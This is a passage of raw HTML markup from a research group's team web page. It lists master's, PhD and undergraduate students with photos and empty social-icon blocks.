v-inner-md-2 v-inner-2 style-610 style-local-182-c145 position-relative\" data-colibri-id=\"182-c145\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-611 style-local-182-c146 position-relative h-element\" data-colibri-id=\"182-c146\">\n<div class=\"h-heading__outer style-611 style-local-182-c146\">\n<h4 class=\"\">Emma McDaniel</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-612 style-local-182-c147 position-relative h-element\" data-colibri-id=\"182-c147\">\n<div class=\"\">\n\nPhD student\n\n</div>\n</div>\n<div class=\"style-613 style-local-182-c148 position-relative h-element\" data-colibri-id=\"182-c148\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-607-outer style-local-182-c149-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-607 style-local-182-c149 position-relative\" data-colibri-id=\"182-c149\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-608 style-local-182-c150 position-relative h-element\" data-colibri-id=\"182-c150\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-1007 style-608-image style-local-182-c150-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-sathwik-2-scaled-1.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-608-frameImage style-local-182-c150-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-609 style-local-182-c151 position-relative\" data-colibri-id=\"182-c151\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-610-outer style-local-182-c152-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-610 style-local-182-c152 position-relative\" data-colibri-id=\"182-c152\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-611 style-local-182-c153 position-relative h-element\" data-colibri-id=\"182-c153\">\n<div class=\"h-heading__outer style-611 style-local-182-c153\">\n<h4 class=\"\">Sathwik Chowda</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-612 style-local-182-c154 position-relative h-element\" data-colibri-id=\"182-c154\">\n<div class=\"\">\n\nMaster\'s student\n\n</div>\n</div>\n<div class=\"style-613 style-local-182-c155 position-relative h-element\" data-colibri-id=\"182-c155\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-607-outer style-local-182-c156-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-607 style-local-182-c156 position-relative\" data-colibri-id=\"182-c156\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-608 style-local-182-c157 position-relative h-element\" data-colibri-id=\"182-c157\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-1094 style-608-image style-local-182-c157-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Jean.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-608-frameImage style-local-182-c157-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-609 style-local-182-c158 position-relative\" data-colibri-id=\"182-c158\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-610-outer style-local-182-c159-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-610 style-local-182-c159 position-relative\" data-colibri-id=\"182-c159\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-611 style-local-182-c160 position-relative h-element\" data-colibri-id=\"182-c160\">\n<div class=\"h-heading__outer style-611 style-local-182-c160\">\n<h4 class=\"\">Jean Guo</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-612 style-local-182-c161 position-relative h-element\" data-colibri-id=\"182-c161\">\n<div class=\"\">\n\nMaster\'s student\n\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-607-outer style-local-182-c162-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-607 style-local-182-c162 position-relative\" data-colibri-id=\"182-c162\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-608 style-local-182-c163 position-relative h-element\" data-colibri-id=\"182-c163\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-1336 style-608-image style-local-182-c163-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-IMG_1240-scaled-1.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-608-frameImage style-local-182-c163-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-609 style-local-182-c164 position-relative\" data-colibri-id=\"182-c164\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-610-outer style-local-182-c165-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-610 style-local-182-c165 position-relative\" data-colibri-id=\"182-c165\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-611 style-local-182-c166 position-relative h-element\" data-colibri-id=\"182-c166\">\n<div class=\"h-heading__outer style-611 style-local-182-c166\">\n<h4 class=\"\">Aaja Christie</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-612 style-local-182-c167 position-relative h-element\" data-colibri-id=\"182-c167\">\n<div class=\"\">\n\nPhD student\n\n</div>\n</div>\n<div class=\"style-613 style-local-182-c168 position-relative h-element\" data-colibri-id=\"182-c168\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-701 style-local-182-c223 position-relative\" data-colibri-id=\"182-c223\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-702-outer style-local-182-c224-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-702 style-local-182-c224 position-relative\" data-colibri-id=\"182-c224\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-707 style-local-182-c229 position-relative h-element\" data-colibri-id=\"182-c229\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-1372 style-707-image style-local-182-c229-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/11/cropped-cropped-bayo.jpeg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-707-frameImage style-local-182-c229-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-global-transition-all h-heading style-704 style-local-182-c226 position-relative h-element\" data-colibri-id=\"182-c226\">\n<div class=\"h-heading__outer style-704 style-local-182-c226\">\n<h4 class=\"\">Sikiru Bayo Abdulkareem</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-710 style-local-182-c231 position-relative h-element\" data-colibri-id=\"182-c231\">\n<div class=\"\">\n\nMaster\'s student\n\n</div>\n</div>\n<div class=\"style-709 style-local-182-c230 position-relative h-element\" data-colibri-id=\"182-c230\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Socicon (http://www.socicon.com)-->\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-703-outer style-local-182-c225-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-703 style-local-182-c225 position-relative\" data-colibri-id=\"182-c225\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\"></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div id=\"team-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-626 style-local-182-c172 position-relative\" data-colibri-component=\"section\" data-colibri-id=\"182-c172\">\n<div class=\"h-section-grid-container h-section-boxed-container\">\n<div class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-638 style-local-182-c209 position-relative\" data-colibri-id=\"182-c209\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-639-outer style-local-182-c210-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-639 style-local-182-c210 position-relative\" data-colibri-id=\"182-c210\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-640 style-local-182-c211 position-relative h-element\" data-colibri-id=\"182-c211\">\n<div class=\"h-heading__outer style-640 style-local-182-c211\">\n<h2 class=\"\">Undergraduate Students</h2>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-627 style-local-182-c173 position-relative\" data-colibri-id=\"182-c173\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-628-outer style-local-182-c174-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-628 style-local-182-c174 position-relative\" data-colibri-id=\"182-c174\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-629 style-local-182-c175 position-relative h-element\" data-colibri-id=\"182-c175\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-817 style-629-image style-local-182-c175-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bronson.png\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-629-frameImage style-local-182-c175-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-630 style-local-182-c176 position-relative\" data-colibri-id=\"182-c176\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-631-outer style-local-182-c177-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-631 style-local-182-c177 position-relative\" data-colibri-id=\"182-c177\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-632 style-local-182-c178 position-relative h-element\" data-colibri-id=\"182-c178\">\n<div class=\"h-heading__outer style-632 style-local-182-c178\">\n<h4 class=\"\">Bronson Tharpe</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-633 style-local-182-c179 position-relative h-element\" data-colibri-id=\"182-c179\">\n<div class=\"\">\n\nUndergrad student\n\n</div>\n</div>\n<div class=\"style-634 style-local-182-c180 position-relative h-element\" data-colibri-id=\"182-c180\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-628-outer style-local-182-c181-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-628 style-local-182-c181 position-relative\" data-colibri-id=\"182-c181\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-629 style-local-182-c182 position-relative h-element\" data-colibri-id=\"182-c182\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-853 style-629-image style-local-182-c182-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-ruby_parcells-scaled-1.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-629-frameImage style-local-182-c182-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-630 style-local-182-c183 position-relative\" data-colibri-id=\"182-c183\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-631-outer style-local-182-c184-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-631 style-local-182-c184 position-relative\" data-colibri-id=\"182-c184\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-632 style-local-182-c185 position-relative h-element\" data-colibri-id=\"182-c185\">\n<div class=\"h-heading__outer style-632 style-local-182-c185\">\n<h4 class=\"\">Ruby Parcells</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-633 style-local-182-c186 position-relative h-element\" data-colibri-id=\"182-c186\">\n<div class=\"\">\n\n<span style=\"color: #4055a9; font-family: \'Open Sans\'; font-size: 16px; font-weight: 400;\">Undergrad student</span>\n\n</div>\n</div>\n<div class=\"style-635 style-local-182-c187 position-relative h-element\" data-colibri-id=\"182-c187\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Socicon (http://www.socicon.com)-->\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-628-outer style-local-182-c188-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-628 style-local-182-c188 position-relative\" data-colibri-id=\"182-c188\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-629 style-local-182-c189 position-relative h-element\" data-colibri-id=\"182-c189\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-820 style-629-image style-local-182-c189-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Anvith.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-629-frameImage style-local-182-c189-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-630 style-local-182-c190 position-relative\" data-colibri-id=\"182-c190\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-631-outer style-local-182-c191-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-631 style-local-182-c191 position-relative\" data-colibri-id=\"182-c191\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-632 style-local-182-c192 position-relative h-element\" data-colibri-id=\"182-c192\">\n<div class=\"h-heading__outer style-632 style-local-182-c192\">\n<h4 class=\"\">Anvith Anand</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-633 style-local-182-c193 position-relative h-element\" data-colibri-id=\"182-c193\">\n<div class=\"\">\n\n<span style=\"color: #4055a9; font-family: \'Open Sans\'; font-size: 16px; font-weight: 400;\">Undergrad student</span>\n\n</div>\n</div>\n<div class=\"style-636 style-local-182-c194 position-relative h-element\" data-colibri-id=\"182-c194\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-628-outer style-local-182-c195-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-628 style-local-182-c195 position-relative\" data-colibri-id=\"182-c195\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-629 style-local-182-c196 position-relative h-element\" data-colibri-id=\"182-c196\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-1022 style-629-image style-local-182-c196-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-sara.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-629-frameImage style-local-182-c196-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-630 style-local-182-c197 position-relative\" data-colibri-id=\"182-c197\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-631-outer style-local-182-c198-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-631 style-local-182-c198 position-relative\" data-colibri-id=\"182-c198\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-632 style-local-182-c199 position-relative h-element\" data-colibri-id=\"182-c199\">\n<div class=\"h-heading__outer style-632 style-local-182-c199\">\n<h4 class=\"\">Sara Edwards</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-633 style-local-182-c200 position-relative h-element\" data-colibri-id=\"182-c200\">\n<div class=\"\">\n\n<span style=\"font-weight: 400; font-size: 16px; font-family: \'Open Sans\'; color: #4055a9;\">Undergrad student</span>\n\n</div>\n</div>\n<div class=\"style-637 style-local-182-c201 position-relative h-element\" data-colibri-id=\"182-c201\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-628-outer style-local-182-c202-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-628 style-local-182-c202 position-relative\" data-colibri-id=\"182-c202\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-629 style-local-182-c203 position-relative h-element\" data-colibri-id=\"182-c203\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-1050 style-629-image style-local-182-c203-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Ryan-e1649958770354.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-629-frameImage style-local-182-c203-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-630 style-local-182-c204 position-relative\" data-colibri-id=\"182-c204\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-631-outer style-local-182-c205-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-631 style-local-182-c205 position-relative\" data-colibri-id=\"182-c205\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-632 style-local-182-c206 position-relative h-element\" data-colibri-id=\"182-c206\">\n<div class=\"h-heading__outer style-632 style-local-182-c206\">\n<h4 class=\"\">Ryan Garland</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-633 style-local-182-c207 position-relative h-element\" data-colibri-id=\"182-c207\">\n<div class=\"\">\n\n<span style=\"font-weight: 400; font-size: 16px; font-family: \'Open Sans\'; color: #4055a9;\">Undergrad student</span>\n\n</div>\n</div>\n<div class=\"style-634 style-local-182-c208 position-relative h-element\" data-colibri-id=\"182-c208\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-680 style-local-182-c212 position-relative\" data-colibri-component=\"section\" data-colibri-id=\"182-c212\">\n<div class=\"h-section-grid-container h-section-boxed-container\">\n<div class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-681 style-local-182-c213 position-relative\" data-colibri-id=\"182-c213\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-683-outer 